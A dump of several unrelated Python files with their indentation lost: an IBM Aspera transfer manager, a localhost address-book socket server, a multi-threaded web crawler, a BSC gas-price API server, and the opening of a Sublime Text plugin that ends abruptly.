# demo1: create the test for the demo1, and store it in file (option2)
#
if len(sys.argv) > 1:
if sys.argv[1] == "demo1":
fileName = sys.argv[2]
print("creating demo and save as ",fileName)
m = Model()
m.create_test()
m.show()
fileName = sys.argv[2]
m.save(fileName)
|
manager.py
|
# Copyright 2018 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
import json
import requests
import logging
import uuid
import six
import threading
from collections import OrderedDict
from collections import deque
from ibm_s3transfer.manager import TransferCoordinatorController
from ibm_s3transfer.futures import TransferMeta
from ibm_s3transfer.utils import CallArgs
from ibm_botocore.client import BaseClient
from ibm_botocore.credentials import DelegatedTokenManager
from ibm_s3transfer.exceptions import CancelledError
from ibm_s3transfer.exceptions import FatalError
from ibm_s3transfer.aspera.exceptions import AsperaTransferQueueError
from ibm_s3transfer.aspera.futures import AsperaTransferCoordinator
from ibm_s3transfer.aspera.futures import AsperaTransferFuture
from ibm_s3transfer.aspera.futures import enumAsperaDirection
from ibm_s3transfer.aspera.subscribers import AsperaBaseSubscriber
from ibm_s3transfer.aspera.utils import check_io_access, FilePair
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
logger = logging.getLogger("ibmcos.aspera")
RECEIVER_CLIENT_IDS = 'aspera_ats'
class AsperaConfig(object):
''' AsperaConfig - Configurations used to update the Aspera transfer spec
which controls how a file is transferred '''
def __init__(self,
target_rate_mbps=None,
target_rate_cap_mbps=None,
min_rate_cap_mbps=None,
min_rate_mbps=None,
rate_policy=None,
lock_min_rate=None,
lock_target_rate=None,
lock_rate_policy=None,
multi_session=None,
multi_session_threshold_mb=None,
destination_root=None):
"""Configuration for the Aspera Uploads and Downloads
:param target_rate_mbps:
Integer: The desired speed of the transfer. If there is competing network traffic,
fasp may share this bandwidth, depending on the rate_policy.
:param target_rate_cap_mbps:
Integer: The maximum target rate for transfers that are authorized
by this access key,in kilobits per second.
:param min_rate_cap_mbps:
:param min_rate_mbps:
Integer: The minimum speed of the transfer. fasp
will only share bandwidth exceeding this value.
Note: This value has no effect if rate_policy is "fixed".
:param rate_policy:
fixed: Transfer at the target rate, regardless of the
actual network capacity. Do not share bandwidth.
high: When sharing bandwidth, transfer at twice the rate of a transfer
using a "fair" policy.
fair (default): Share bandwidth equally with other traffic.
low: Use only unutilized bandwidth
:param lock_min_rate:
True/False: Prevents the user from changing the minimum rate during a transfer.
:param lock_target_rate:
True/False: Prevents the user from changing the target rate during a transfer.
:param lock_rate_policy:
True/False: Prevents the user from changing the rate policy during a transfer.
:param multi_session:
Integer: The number of sessions to use to transfer a file or folder
'all': if specified then multiple remote ips are used(if configured) in the transfer
:param multi_session_threshold_mb:
Integer: The MegaByte threshold size at which a single file can be split
and transferred by multiple sessions
Note: If value is below 60mb , then it is ignored
:param destination_root:
The transfer destination file path. If destinations are specified in paths,
this value is prepended to each destination
"""
self._dict = {}
self.store("multi_session_threshold_mb", multi_session_threshold_mb, int,
"multi_session_threshold", 1000000, [60])
self.store("target_rate_mbps", target_rate_mbps, int,
"target_rate_kbps", 1000)
self.store("target_rate_cap_mbps", target_rate_cap_mbps, int,
"target_rate_cap_kbps", 1000)
self.store("min_rate_cap_mbps", min_rate_cap_mbps, int,
"min_rate_cap_kbps", 1000)
self.store("min_rate_mbps", min_rate_mbps, int,
"min_rate_kbps", 1000)
self.store("rate_policy", rate_policy, str,
allowed_values=['fixed', 'high', 'fair', 'low'])
self.store("lock_min_rate", lock_min_rate, bool)
self.store("lock_target_rate", lock_target_rate, bool)
self.store("lock_rate_policy", lock_rate_policy, bool)
self.store("multi_session", multi_session, int,
allowed_values=['all'])
self.store("destination_root", destination_root, str)
def store(self, name, value, atype, new_name=None, multiplier=None, allowed_values=None):
''' store a config value in a dictionary, these values are used to populate a trasnfer spec
validation -- check type, check allowed values and rename if required '''
if value is not None:
_bad_type = (not isinstance(value, atype))
if not _bad_type:
# special case
_bad_type = (isinstance(value, bool) and atype == int)
if _bad_type:
# could be a special value
if allowed_values and value in allowed_values:
allowed_values = None
else:
raise ValueError("%s should be value of type (%s)" % (name, atype.__name__))
if allowed_values:
if isinstance(value, str):
if value not in allowed_values:
raise ValueError("%s can be %s" % (name, allowed_values))
elif isinstance(value, int):
if isinstance(allowed_values[0], int):
if value < allowed_values[0]:
raise ValueError("%s must be >= %d" % (name, allowed_values[0]))
_val = value if not multiplier else (multiplier * value)
_name = name if not new_name else new_name
self._dict[_name] = _val
@property
def dict(self):
''' get the config values stored in a dictinary '''
return self._dict
@property
def multi_session(self):
''' convert the multi_session param a number '''
_val = 0
if "multi_session" in self._dict:
_val = self._dict["multi_session"]
if str(_val).lower() == 'all':
_val = -1
return int(_val)
@property
def is_multi_session_all(self):
''' is the multi_session param set to all '''
return self.multi_session == -1
class AsperaManagerConfig(object):
''' AsperaManagerConfig - Configurations for the Aspera transfer mangager '''
def __init__(self,
max_submission_queue_size=100,
ascp_max_concurrent=10,
ascp_log_path=None,
max_fasp_cache_size=1000,
verify_ssl=True):
"""Configuration for the Aspera Manager
:param max_submission_queue_size:
The maximum amount of AsperaTransferManager method calls that can be queued at a time.
:param ascp_max_concurrent:
The maximum number of ascp sub processes that can be running at a time.
:param ascp_log_path:
The path where Apera transfer logs are output to.
:param max_fasp_cache_size:
"""
self.max_submission_queue_size = max_submission_queue_size
self.ascp_max_concurrent = ascp_max_concurrent
self.ascp_log_path = ascp_log_path
self.max_fasp_cache_size = max_fasp_cache_size
self.verify_ssl = verify_ssl
class AsperaTransferManager(object):
''' AsperaTransferManager - a class to manage upload/downloads using the Aspera sdk '''
def __init__(self, client, config=None, transfer_config=None, delegated_token_manager=None):
assert(isinstance(client, BaseClient))
if config:
assert (isinstance(config, AsperaManagerConfig))
if transfer_config:
assert (isinstance(transfer_config, AsperaConfig))
self._client = client
self._transfer_config = transfer_config
self._config = config
if not self._config:
self._config = AsperaManagerConfig()
if self._config.ascp_log_path:
AsperaTransferManager.set_log_details(self._config.ascp_log_path)
self._coordinator_controller = AsperaTransferCoordinatorController(self._config)
# Aspera metadata caching function
self._get_aspera_metadata = (
lru_cache(maxsize=self._config.max_fasp_cache_size)(self._raw_aspera_metadata))
if delegated_token_manager:
self._delegated_token_manager = delegated_token_manager
else:
_client_credentials = self._client._request_signer._credentials
self._delegated_token_manager = (
DelegatedTokenManager(api_key_id=_client_credentials.api_key_id,
service_instance_id=_client_credentials.service_instance_id,
auth_endpoint=_client_credentials.auth_endpoint,
receiver_client_ids=RECEIVER_CLIENT_IDS,
verify=self._config.verify_ssl))
def _raw_aspera_metadata(self, bucket):
''' get the Aspera connection details on Aspera enabled buckets '''
response = self._client.get_bucket_aspera(Bucket=bucket)
# Parse metadata from response
aspera_access_key = response['AccessKey']['Id']
aspera_secret_key = response['AccessKey']['Secret']
ats_endpoint = response['ATSEndpoint']
return aspera_access_key, aspera_secret_key, ats_endpoint
def _fetch_transfer_spec(self, node_action, token, bucket_name, paths):
''' make hhtp call to Aspera to fetch back trasnfer spec '''
aspera_access_key, aspera_secret_key, ats_endpoint = self._get_aspera_metadata(bucket_name)
_headers = {'accept': "application/json",
'Content-Type': "application/json"}
credentials = {'type': 'token',
'token': {'delegated_refresh_token': token}}
_url = ats_endpoint
_headers['X-Aspera-Storage-Credentials'] = json.dumps(credentials)
_data = {'transfer_requests': [
{'transfer_request': {'paths': paths, 'tags': {'aspera': {
'node': {'storage_credentials': credentials}}}}}]}
_session = requests.Session()
_response = _session.post(url=_url + "/files/" + node_action,
auth=(aspera_access_key, aspera_secret_key),
headers=_headers, json=_data, verify=self._config.verify_ssl)
return _response
def _create_transfer_spec(self, call_args):
''' pass the transfer details to aspera and receive back a
populated transfer spec complete with access token '''
_paths = []
for _file_pair in call_args.file_pair_list:
_path = OrderedDict()
if call_args.direction == enumAsperaDirection.SEND:
_action = "upload_setup"
_path['source'] = _file_pair.fileobj
_path['destination'] = _file_pair.key
else:
_action = "download_setup"
_path['source'] = _file_pair.key
_path['destination'] = _file_pair.fileobj
_paths.append(_path)
# Add credentials before the transfer spec is requested.
delegated_token = self._delegated_token_manager.get_token()
_response = self._fetch_transfer_spec(_action, delegated_token, call_args.bucket, _paths)
tspec_dict = json.loads(_response.content)['transfer_specs'][0]['transfer_spec']
tspec_dict["destination_root"] = "/"
if (call_args.transfer_config):
tspec_dict.update(call_args.transfer_config.dict)
if call_args.transfer_config.is_multi_session_all:
tspec_dict['multi_session'] = 0
_remote_host = tspec_dict['remote_host'].split('.')
# now we append '-all' to the remote host
_remote_host[0] += "-all"
tspec_dict['remote_host'] = ".".join(_remote_host)
logger.info("New remote_host(%s)" % tspec_dict['remote_host'])
call_args.transfer_spec = json.dumps(tspec_dict)
return True
def upload_directory(self, directory, bucket, key, transfer_config=None, subscribers=None):
''' upload a directory using Aspera '''
check_io_access(directory, os.R_OK)
return self._queue_task(bucket, [FilePair(key, directory)], transfer_config,
subscribers, enumAsperaDirection.SEND)
def download_directory(self, bucket, key, directory, transfer_config=None, subscribers=None):
''' download a directory using Aspera '''
check_io_access(directory, os.W_OK)
return self._queue_task(bucket, [FilePair(key, directory)], transfer_config,
subscribers, enumAsperaDirection.RECEIVE)
def upload(self, fileobj, bucket, key, transfer_config=None, subscribers=None):
''' upload a file using Aspera '''
check_io_access(fileobj, os.R_OK, True)
return self._queue_task(bucket, [FilePair(key, fileobj)], transfer_config,
subscribers, enumAsperaDirection.SEND)
def download(self, bucket, key, fileobj, transfer_config=None, subscribers=None):
''' download a file using Aspera '''
check_io_access(os.path.dirname(fileobj), os.W_OK)
return self._queue_task(bucket, [FilePair(key, fileobj)], transfer_config,
subscribers, enumAsperaDirection.RECEIVE)
@staticmethod
def set_log_details(aspera_log_path=None,
sdk_log_level=logging.NOTSET):
''' set the aspera log path - used by th Ascp process
set the internal aspera sdk activity - for debug purposes '''
if aspera_log_path:
check_io_access(aspera_log_path, os.W_OK)
AsperaTransferCoordinator.set_log_location(aspera_log_path)
if sdk_log_level != logging.NOTSET:
if logger:
if not len(logger.handlers):
handler = logging.StreamHandler()
_fmt = '%(asctime)s %(levelname)s %(message)s'
handler.setFormatter(logging.Formatter(_fmt))
logger.addHandler(handler)
logger.setLevel(sdk_log_level)
def _validate_args(self, args):
''' validate the user arguments '''
assert(args.bucket)
if args.subscribers:
for _subscriber in args.subscribers:
assert(isinstance(_subscriber, AsperaBaseSubscriber))
if (args.transfer_config):
assert(isinstance(args.transfer_config, AsperaConfig))
# number of sessions requested cant be greater than max ascps
if args.transfer_config.multi_session > self._config.ascp_max_concurrent:
raise ValueError("Max sessions is %d" % self._config.ascp_max_concurrent)
for _pair in args.file_pair_list:
if not _pair.key or not _pair.fileobj:
raise ValueError("Invalid file pair")
def _queue_task(self, bucket, file_pair_list, transfer_config, subscribers, direction):
''' queue the upload/download - when get processed when resources available
Use class level transfer_config if not defined. '''
config = transfer_config if transfer_config else self._transfer_config
_call_args = CallArgs(bucket=bucket,
file_pair_list=file_pair_list,
transfer_config=config,
subscribers=subscribers,
direction=direction,
transfer_spec=None,
transfer_spec_func=self._create_transfer_spec,
transfer_id=str(uuid.uuid4()))
self._validate_args(_call_args)
return self._coordinator_controller._queue_task(_call_args)
def __enter__(self):
''' enter the AsperaTransferManager scope '''
return self
def __exit__(self, exc_type, exc_value, *args):
''' exit the AsperaTransferManager scope
cancel all running transfers and free resources '''
cancel = False
cancel_msg = ''
cancel_exc_type = FatalError
# If a exception was raised in the context handler, signal to cancel
# all of the in progress futures in the shutdown.
if exc_type:
cancel = True
cancel_msg = six.text_type(exc_value)
if not cancel_msg:
cancel_msg = repr(exc_value)
# If it was a KeyboardInterrupt, the cancellation was initiated by the user.
if isinstance(exc_value, KeyboardInterrupt):
cancel_exc_type = CancelledError
self._shutdown(cancel, cancel_msg, cancel_exc_type)
def shutdown(self, cancel=False, cancel_msg=''):
"""Shutdown the TransferManager
waits till all transfers complete before it completely shuts down.
:type cancel: boolean
:param cancel: If True, calls TransferFuture.cancel() for
all in-progress in transfers. This is useful if you want the
shutdown to happen quicker.
:type cancel_msg: str
:param cancel_msg: The message to specify if canceling all in-progress
transfers.
"""
self._shutdown(cancel, cancel, cancel_msg)
def _shutdown(self, cancel, cancel_msg, exc_type=CancelledError):
''' Internal shutdown used by 'shutdown' method above '''
if cancel:
# Cancel all in-flight transfers if requested, before waiting
# for them to complete.
self._coordinator_controller.cancel(cancel_msg, exc_type)
try:
# Wait until there are no more in-progress transfers. This is
# wrapped in a try statement because this can be interrupted
# with a KeyboardInterrupt that needs to be caught.
self._coordinator_controller.wait()
except KeyboardInterrupt:
# If not errors were raised in the try block, the cancel should
# have no coordinators it needs to run cancel on. If there was
# an error raised in the try statement we want to cancel all of
# the inflight transfers before shutting down to speed that
# process up.
self._coordinator_controller.cancel('KeyboardInterrupt()')
raise
finally:
self._coordinator_controller.cleanup()
def wait(self):
''' wait for all transfers complete '''
self._coordinator_controller.wait()
class AsperaTransferCoordinatorController(TransferCoordinatorController):
def __init__(self, config):
""" Abstraction to control all transfer coordinators
This abstraction allows the manager to wait for inprogress transfers
to complete and cancel all inprogress transfers."""
super(AsperaTransferCoordinatorController, self).__init__()
self._config = config
self._waiting_transfer_coordinators = deque()
self._processed_coordinators = []
self._lockw = threading.Lock()
self._processing_thread = None
self._processing_event = threading.Event()
self._processing_stopped_event = threading.Event()
self._processing_stop = False
self._cancel_called = False
self._wait_called = False
def cleanup(self):
''' Stop backgroud thread and cleanup resources '''
self._processing_stop = True
self._wakeup_processing_thread()
self._processing_stopped_event.wait(3)
def tracked_coordinator_count(self, count_ascps=False):
''' count the number of cooridnators currently being processed
or count the number of ascps currently being used '''
with self._lock:
_count = 0
if count_ascps:
for _coordinator in self._tracked_transfer_coordinators:
_count += _coordinator.session_count
else:
_count = len(self._tracked_transfer_coordinators)
return _count
def _in_waiting_queue(self, _coordinator):
''' check to see if a coordinator object is in the waiting queue '''
with self._lockw:
return _coordinator in self._waiting_transfer_coordinators
def waiting_coordinator_count(self):
''' count the number of transfers waiting to be processed '''
with self._lockw:
return len(self._waiting_transfer_coordinators)
def _queue_task(self, args):
''' add transfer to waiting queue if possible
then notify the background thread to process it '''
if self._cancel_called:
raise AsperaTransferQueueError("Cancel already called")
elif self._wait_called:
raise AsperaTransferQueueError("Cant queue items during wait")
elif self.waiting_coordinator_count() >= self._config.max_submission_queue_size:
raise AsperaTransferQueueError("Max queued items reached")
else:
_coordinator = AsperaTransferCoordinator(args)
_components = {'meta': TransferMeta(args, transfer_id=args.transfer_id),
'coordinator': _coordinator}
_transfer_future = AsperaTransferFuture(**_components)
_coordinator.add_subscribers(args.subscribers, future=_transfer_future)
_coordinator.add_done_callback(self.remove_aspera_coordinator,
transfer_coordinator=_coordinator)
self.append_waiting_queue(_coordinator)
if not self._processing_thread:
self._processing_thread = threading.Thread(target=self._process_waiting_queue)
self._processing_thread.daemon = True
self._processing_thread.start()
self._wakeup_processing_thread()
return _transfer_future
def remove_aspera_coordinator(self, transfer_coordinator):
''' remove entry from the waiting waiting
or remove item from processig queue and add to processed quque
notify background thread as it may be able to process watiign requests
'''
# usually called on processing completion - but can be called for a cancel
if self._in_waiting_queue(transfer_coordinator):
logger.info("Remove from waiting queue count=%d" % self.waiting_coordinator_count())
with self._lockw:
self._waiting_transfer_coordinators.remove(transfer_coordinator)
else:
logger.info("Remove from processing queue count=%d" % self.tracked_coordinator_count())
try:
self.remove_transfer_coordinator(transfer_coordinator)
self.append_processed_queue(transfer_coordinator)
except Exception:
pass
self._wakeup_processing_thread()
def append_waiting_queue(self, transfer_coordinator):
''' append item to waiting queue '''
logger.debug("Add to waiting queue count=%d" % self.waiting_coordinator_count())
with self._lockw:
self._waiting_transfer_coordinators.append(transfer_coordinator)
def _wakeup_processing_thread(self):
''' set the threading event to wakeup background thread '''
self._processing_event.set()
def append_processed_queue(self, transfer_coordinator):
''' append item to processed queue '''
with self._lock:
self._processed_coordinators.append(transfer_coordinator)
def free_processed_queue(self):
''' call the Aspera sdk to freeup resources '''
with self._lock:
if len(self._processed_coordinators) > 0:
for _coordinator in self._processed_coordinators:
_coordinator.free_resources()
self._processed_coordinators = []
def is_stop(self):
''' has either of the stop processing flags been set '''
if len(self._processed_coordinators) > 0:
self.free_processed_queue()
return self._cancel_called or self._processing_stop
def _process_waiting_queue(self):
''' thread to processes the waiting queue
fetches transfer spec
then calls start transfer
ensures that max ascp is not exceeded '''
logger.info("Queue processing thread started")
while not self.is_stop():
self._processing_event.wait(3)
self._processing_event.clear()
if self.is_stop():
break
while self.waiting_coordinator_count() > 0:
if self.is_stop():
break
_used_slots = self.tracked_coordinator_count(True)
_free_slots = self._config.ascp_max_concurrent - _used_slots
if _free_slots <= 0:
break
with self._lockw:
# check are there enough free slots
_req_slots = self._waiting_transfer_coordinators[0].session_count
if _req_slots > _free_slots:
break
_coordinator = self._waiting_transfer_coordinators.popleft()
self.add_transfer_coordinator(_coordinator)
if not _coordinator.set_transfer_spec():
self.remove_aspera_coordinator(_coordinator)
else:
logger.info("ASCP process queue - Max(%d) InUse(%d) Free(%d) New(%d)" %
(self._config.ascp_max_concurrent,
_used_slots,
_free_slots,
_req_slots))
_coordinator.start_transfer()
logger.info("Queue processing thread stopped")
self._processing_stopped_event.set()
def clear_waiting_coordinators(self, cancel=False):
''' remove all entries from waiting queue or cancell all in waiting queue '''
with self._lockw:
if cancel:
for _coordinator in self._waiting_transfer_coordinators:
_coordinator.notify_cancelled("Clear Waiting Queue", False)
self._waiting_transfer_coordinators.clear()
def cancel(self, *args, **kwargs):
""" Cancel all queue items - then attempt to cancel all in progress items """
self._cancel_called = True
self.clear_waiting_coordinators(cancel=True)
super(AsperaTransferCoordinatorController, self).cancel(*args, **kwargs)
def wait(self):
""" Wait until all in progress and queued items are processed """
self._wait_called = True
while self.tracked_coordinator_count() > 0 or \
self.waiting_coordinator_count() > 0:
time.sleep(1)
super(AsperaTransferCoordinatorController, self).wait()
self._wait_called = False
|
Addressbook_server.py
|
# Import of libraries
import socket # Import main socket library
import atexit # Execute smething before exit
import multiprocessing # For multiple sockets
from Utils import * # General program utilities
from Database import Database
class Socket:
def __init__(self, port, db, pr, ui):
self.ui = ui
self.db = db
self.pr = pr
ui.show("Opening port")
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.bind(('localhost', port))
self.s.listen(5) #become a server socket, maximum 5 connections
ui.show("Ready to accept connections")
def close(self):
self.connection.close()
def handle(self):
try:
while True:
buf = self.connection.recv(255)
if len(buf)> 0:
self.ui.show("serving connection")
temp = self.db.Search( self.pr.GetData( buf.decode('utf-8') ) )
if temp != False:
self.connection.send( self.pr.CreateMessage(temp, False).encode("UTF-8") )
else:
self.connection.send( self.pr.CreateMessage( "NOT_FOUND", False ).encode("UTF-8") )
except:
pass
finally:
self.connection.close()
def work(self):
while True:
self.connection, address = self.s.accept()
process = multiprocessing.Process(
target=self.handle)
process.daemon = True
process.start()
u = UI()
p = Protocol()
d = Database(u)
s = Socket(5678, d, p, u)
# Initialize the socket
s.work()
def exit_handler():
s.close()
atexit.register(exit_handler)
|
crawler_multi_thread.py
|
# SJTU EE208
import threading
import queue
import string
import time
import re
import sys
import os
try:
from lxml import etree
from bs4 import BeautifulSoup
except ImportError:
print('Requirements not satisfied! Please run: pip install -r requirements.txt')
import urllib.request
import urllib.error
import urllib.parse
def get_content(page):
'''
get the content of a page.
Input:
page: str.
Return:
content: str.
'''
headers = {
"user-agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)\
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/85.0.4183.83 Safari/537.36 Edg/85.0.564.44',
}
# add headers to avoid some websites' 403 Forbidden error.
try:
req = urllib.request.Request(url=page, headers=headers)
content = urllib.request.urlopen(req, timeout=10).read().decode('utf-8', 'ignore')
except BaseException as e:
print(e)
return None
else:
return content
def get_all_links(content, page, method='lxml'):
'''
get all the links of the page.
Input:
content: the content of the given page.
page: the URL of the page.
method: it should be 'lxml' or 'BeautifulSoup',
determining which method to be used to process the content.
By default we will use 'lxml', for the reason that it is
much faster.
Return:
links: list, containing all the useful 'href's of the given page's content.
'''
def valid_str(s: str):
'''
Check whether the string s is a valid URL.
A valid URL should be a absolute address
or a relative address beginning with '//'.
'''
return (len(s) > 1 and s[:2] == '//') \
or (len(s) > 3 and s[:4] == 'http')
links = None
target_pattern = re.compile('^http|^/')
if method == 'lxml':
# get all the links through 'lxml' and its xpath method.
links = etree.HTML(content.encode('utf-8')).xpath('//a/@href')
links = [urllib.parse.urljoin(page, x) for x in links if valid_str(x)]
elif method == 'BeautifulSoup':
# get all the links through 'BeautifulSoup'
soup = BeautifulSoup(content, features="html.parser")
tag_a = soup.find_all('a', {'href': re.compile('^http|^/')})
links = [x['href'] for x in tag_a]
links = [urllib.parse.urljoin(page, x) for x in links]
else:
raise ValueError
return list(set(links)) # remove duplicate
def valid_filename(s):
valid_chars = "-_.() %s%s" % (string.ascii_letters, string.digits)
s = ''.join(c for c in s if c in valid_chars)
if len(s) > 127:
s = s[:127] # avoid file name too long error.
return s
def add_page_to_folder(page, content): # 将网页存到文件夹里,将网址和对应的文件名写入index.txt中
index_filename = 'index.txt' # index.txt中每行是'网址 对应的文件名'
folder = 'html_multi' # 存放网页的文件夹
filename = valid_filename(page) # 将网址变成合法的文件名
filename = filename + '.html'
index = open(index_filename, 'a')
index.write(str(page.encode('ascii', 'ignore')) + '\t' + filename + '\n')
index.close()
if not os.path.exists(folder): # 如果文件夹不存在则新建
os.mkdir(folder)
f = open(os.path.join(folder, filename), 'w', encoding='utf-8')
f.write(str(content)) # 将网页存入文件
f.close()
def working():
global count
while True:
page = q.get()
if count >= max_page:
q.task_done()
return
print(f'current page: {page}')
# pages = get_page(page) # get the content of the page
content = get_content(page)
if content is None: # which means that some error occured when trying to get the content of the page.
q.task_done()
continue
add_page_to_folder(page, content) # add the page to the folder we use to store the pages we get.
outlinks = get_all_links(content, page) # get the links of the page.
if varLock.acquire():
for link in outlinks:
if link not in crawled:
q.put(link)
crawled.add(link)
print(f'task complete: {count}/{max_page}')
crawled.add(page)
count += 1
varLock.release()
q.task_done()
def get_seed_and_maxPage():
'''
get the seed and max page number from
whether command line argument or console input.
'''
seed = None
max_page = None
if len(sys.argv) == 1:
seed = input("please input the seed URL: ")
while True:
try:
max_page = int(input("please input the max page number: "))
except ValueError:
print("Invalid max page number, please input again: ")
else:
break
else:
_, seed, max_page = sys.argv
while True:
print(1)
try:
max_page = int(max_page)
except ValueError:
max_page = input("Invalid max page number, please input again: ")
else:
break
return seed, max_page
if __name__ == '__main__':
print('current folder: ', os.getcwd())
seed, max_page = get_seed_and_maxPage()
start = time.time() # start time.
count = 0 # the number of pages we have saved in our local machine.
crawled = set([seed]) # A set used to determine whether a URL is crawled or not.
varLock = threading.Lock() # the lock used to avoid unpredictable error caused by multithread.
q = queue.Queue()
q.put(seed)
thread_list = [] # the list used to store all the subthreads.
for i in range(4):
t = threading.Thread(target=working)
t.setDaemon(True) # set the thread to be a deamon thread.
thread_list.append(t)
t.start()
for x in thread_list:
x.join() # the main thread will wait here until the task was
# completed by the subthreads.
end = time.time()
print(end - start) # calculate the consumed time.
with open('crawled.txt', 'w', encoding='utf-8') as f:
for x in crawled:
f.write(x)
f.write('\n') # print all the crawled URL into the file f.
|
gasprice.py
|
import os
import click
import logging
import pandas as pd
from time import sleep
from threading import Thread
from collections import deque
from statistics import mean
from itertools import chain
from web3 import Web3, HTTPProvider
from web3.middleware import geth_poa_middleware
from sanic import Sanic, response
from retry import retry
import random
import time
# https://bsc-dataseed1.defibit.io/
# https://bsc-dataseed1.ninicoin.io/ # is to slow
BSC_RPCS = ['https://bsc-dataseed.binance.org/', 'https://bsc-dataseed1.defibit.io/']
BSC_RPC_URL = os.environ.get('BSC_RPC_URL', BSC_RPCS[0])
QUANTILES = dict(SafeGasPrice=0, ProposeGasPrice=5, FastGasPrice=7.5, InstantGasPrice=15)
WINDOW = 50
w3 = Web3(HTTPProvider(BSC_RPC_URL, request_kwargs={'timeout': 15}))
w3.middleware_onion.inject(geth_poa_middleware, layer=0)
app = Sanic('bscgas')
log = logging.getLogger('sanic.error')
app.config.LOGO = ''
block_times = deque(maxlen=WINDOW)
blocks_gwei = deque(maxlen=WINDOW)
stats = {}
instances = {}
def web3_instance():
random_index = random.randint(0, len(BSC_RPCS)-1)
w3 = Web3(HTTPProvider(BSC_RPCS[random_index],request_kwargs={'timeout': 15}))
w3.middleware_onion.inject(geth_poa_middleware, layer=0, name='i'+str(random_index))
log.warning("get index ----: {} {}".format(str(random_index), BSC_RPCS[random_index]))
return w3
# @retry(Exception, delay=2, logger=log)
def worker(skip_warmup):
stats['health'] = False
localw3 = web3_instance()
localw3.middleware_onion.inject(geth_poa_middleware, layer=0)
# print(localw3.clientVersion)
latest = localw3.eth.filter('latest')
# print('worker:', latest)
if not skip_warmup and not block_times:
warmup()
while True:
try:
for n in latest.get_new_entries():
process_block(localw3, n)
log.info(str(stats))
if not localw3.eth.syncing:
stats['health'] = True
except:
sleep(5)
localw3 = web3_instance()
latest = localw3.eth.filter('latest')
log.warning("do reconnect ------- {} {} {}".format(int(time.time()), str(localw3), str(latest)))
continue
sleep(2)
def warmup():
tip = w3.eth.blockNumber
with click.progressbar(range(tip - WINDOW, tip), label='warming up') as bar:
for n in bar:
process_block(w3, n)
def block_time():
if len(block_times) < 2:
return 0
times = sorted(block_times)
avg = mean(b - a for a, b in zip(times, times[1:]))
stats['block_time'] = round(avg, 2)
return avg
def average(lst):
return sum(lst) / len(lst)
def process_block(w3i, n):
block = w3i.eth.getBlock(n, True)
stats['block_number'] = block.number
block_times.append(block.timestamp)
if len(block_times) > 1:
t = sorted(block_times)
stats['block_time'] = round(mean(b - a for a, b in zip(t, t[1:])), 3)
if block.transactions:
prices = []
for tx in block.transactions:
if int(tx.gasPrice) > 0:
prices.append(tx.gasPrice)
blocks_gwei.append(min(prices))
data = pd.Series(blocks_gwei)
for name, q in QUANTILES.items():
if name in ['FastGasPrice']:
stats[name] = round(float(w3i.fromWei(average(prices), 'gwei')), 3)
elif name in ['InstantGasPrice']:
stats[name] = round(float(w3i.fromWei(max(prices), 'gwei')), 3)
else:
price = data.quantile(q / 100)
stats[name] = round(float(w3i.fromWei(price, 'gwei')), 3)
print(stats)
return block
@app.route('/')
async def api(request):
return response.json(stats)
@app.route('/health')
async def health(request):
return response.json({'health': stats['health']}, status=200 if stats['health'] else 503)
@click.command()
@click.option('--host', '-h', default='0.0.0.0')
@click.option('--port', '-p', default=8000)
@click.option('--skip-warmup', '-s', is_flag=False)
def main(host, port, skip_warmup):
print('skip_warmup', skip_warmup, host, port)
bg = Thread(target=worker, args=(skip_warmup,))
bg.daemon = True
bg.start()
app.run(host=host, port=port, access_log=False)
if __name__ == '__main__':
main()
|
pep.py
|
import html
import inspect
import subprocess
import os
import re
import tempfile
import json
import traceback
import pprint
import threading
import time
import linecache
import pathlib
from urllib.parse import urlparse
from zipfile import ZipFile
from collections import defaultdict
import sublime_plugin
import sublime
GOTO_DEFAULT_FLAGS = sublime.ENCODED_POSITION
GOTO_USAGE_FLAGS = sublime.ENCODED_POSITION | sublime.TRANSIENT
GOTO_SIDE_BY_SIDE_FLAGS = (
sublime.ENCODED_POSITION
| sublime.SEMI_TRANSIENT
| sublime.ADD_TO_SELECTION
| sublime.CLEAR_TO_RIGHT
)
# Thingy types
TT_KEYWORD = "keyword"
TT_LOCAL_BINDING = "local_binding"
TT_LOCAL_USAGE = "local_usage"
TT_VAR_DEFINITION = "var_definition"
TT_VAR_USAGE = "var_usage"
TT_NAMESPACE_DEFINITION = "namespace_definition"
TT_NAMESPACE_USAGE = "namespace_usage"
TT_NAMESPACE_USAGE_ALIAS = "namespace_usage_alias"
OUTPUT_PANEL_NAME = "pep"
OUTPUT_PANEL_NAME_PREFIXED = f"output.{OUTPUT_PANEL_NAME}"
_view_analysis_ = {}
_paths_analysis_ = {}
_classpath_analysis_ = {}
def show_output_panel(window):
window.run_command("show_panel", {"panel": OUTPUT_PANEL_NAME_PREFIXED})
def hide_output_panel(window):
window.run_command("hide_panel", {"panel": OUTPUT_PANEL_NAME_PREFIXED})
def hide_active_output_panel(window):
if window.active_panel() == OUTPUT_PANEL_NAME_PREFIXED:
hide_output_panel(window)
def output_panel(window):
return window.find_output_panel(OUTPUT_PANEL_NAME) or window.create_output_panel(
OUTPUT_PANEL_NAME
)
def set_paths_analysis(project_path, analysis):
"""
Updates analysis for paths.
"""
global _paths_analysis_
_paths_analysis_[project_path] = analysis
def paths_analysis(project_path):
"""
Returns analysis for paths.
"""
global _paths_analysis_
return _paths_analysis_.get(project_path, {})
def set_classpath_analysis(project_path, analysis):
"""
Updates analysis for project.
"""
global _classpath_analysis_
_classpath_analysis_[project_path] = analysis
def classpath_analysis(project_path):
"""
Returns analysis for project.
"""
global _classpath_analysis_
return _classpath_analysis_.get(project_path, {})
def set_view_analysis(view_id, analysis):
"""
Updates analysis for a particular view.
"""
global _view_analysis_
_view_analysis_[view_id] = analysis
def view_analysis(view_id):
"""
Returns analysis for a particular view.
"""
global _view_analysis_
return _view_analysis_.get(view_id, {})
# ---
def analysis_view_change_count(view):
return view_analysis(view.id()).get("view_change_count")
def analysis_findings(analysis):
return analysis.get("findings", {})
def analysis_summary(analysis):
return analysis.get("summary", {})
def analysis_kindex(analysis):
"""
